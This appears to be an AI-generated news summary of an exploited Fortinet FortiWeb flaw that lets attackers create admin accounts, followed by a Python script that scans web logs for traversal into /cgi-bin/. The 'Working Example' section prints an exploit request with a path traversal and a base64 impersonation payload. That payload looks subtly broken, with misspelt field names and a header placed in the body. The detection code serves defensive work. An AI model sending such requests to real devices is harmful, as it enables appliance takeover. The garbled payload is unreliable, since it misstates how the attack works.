
Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts


These articles are AI-generated summaries. Please check the original sources for full details.

Cybersecurity researchers report active exploitation of a Fortinet FortiWeb vulnerability that lets attackers create administrator accounts. The flaw, patched in version 8.0.2, was exploited through a path traversal combined with an authentication bypass to gain full control of the device.

Why This Matters

A patched vulnerability stays dangerous on every appliance that has not yet received the patch. This flaw shows how attackers chain bugs, here a path traversal and a header-based authentication bypass, to get past security layers. The indiscriminate exploitation suggests widespread compromise of unpatched devices, with potential for persistent access and privilege escalation.

Key Insights

  • “Patched in version 8.0.2, the vulnerability allows attackers to perform actions as a privileged user” (watchTowr, 2025)
  • “Path traversal and CGIINFO header manipulation bypass authentication” (watchTowr Labs, 2025)
  • “watchTowr released an artifact generator tool to identify susceptible devices” (The Hacker News, 2025)

Working Example

POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiweb.com
Content-Type: application/json
Content-Length: 132

{
  "CGIINFO": "eyJ1c2VybmFtZSI6ImFkbWluIiwicHJvZmZpY2UiOiJwcm9mX2FkbWluIiwidmRvbiI6InJvb3QiLCJsZW5jb2xpbmUiOiJhZG1pbiJ9"
}
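The request above resolves an API path into /cgi-bin/fwbcgi through encoded traversal segments. The following detection check is an added example, not code from the page or from watchTowr: it normalises request paths from constructed web-server log lines the way a naive path join would, and flags requests that use traversal to land in /cgi-bin/. The log format and sample addresses are assumptions.

```python
import re
from urllib.parse import unquote
from typing import List, Dict

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Nov/2025:10:01:02 +0000] "GET /api/v2.0/cmdb/system/status HTTP/1.1" 200 512
10.0.0.9 - - [14/Nov/2025:10:01:09 +0000] "POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 88
10.0.0.9 - - [14/Nov/2025:10:01:10 +0000] "POST /api/v2.0/cmdb/system/admin%3f/..%2f..%2f..%2f..%2f..%2fcgi-bin%2ffwbcgi HTTP/1.1" 200 88
10.0.0.7 - - [14/Nov/2025:10:02:00 +0000] "GET /cgi-bin/fwbcgi HTTP/1.1" 403 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def normalize_path(raw: str) -> str:
    """URL-decode twice (catches %252e-style double encoding), then resolve
    '.' and '..' segments as a naive file-system join would. A literal '?'
    produced by %3F is kept as part of its segment, since that is what the
    back end joins onto the path."""
    parts: List[str] = []
    for seg in unquote(unquote(raw)).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)

def is_suspicious(raw_path: str) -> bool:
    """Flag traversal that resolves into the CGI directory."""
    has_traversal = ".." in unquote(unquote(raw_path))
    return has_traversal and "/cgi-bin/" in normalize_path(raw_path)

def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose request path matches the rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious(m["path"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "raw": m["path"], "resolved": normalize_path(m["path"]),
                         "status": m["status"]})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['raw']} -> {hit['resolved']} ({hit['status']})")
```

A hit with a 2xx status on an appliance below 8.0.2 is a cue to audit the admin account list and session state on that device, not just to block the source.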

Practical Applications

  • Use Case: Threat actors abuse unpatched FortiWeb appliances to create persistent admin access.
  • Pitfall: Delaying the patch leaves appliances exposed to unauthorised account creation and privilege escalation.
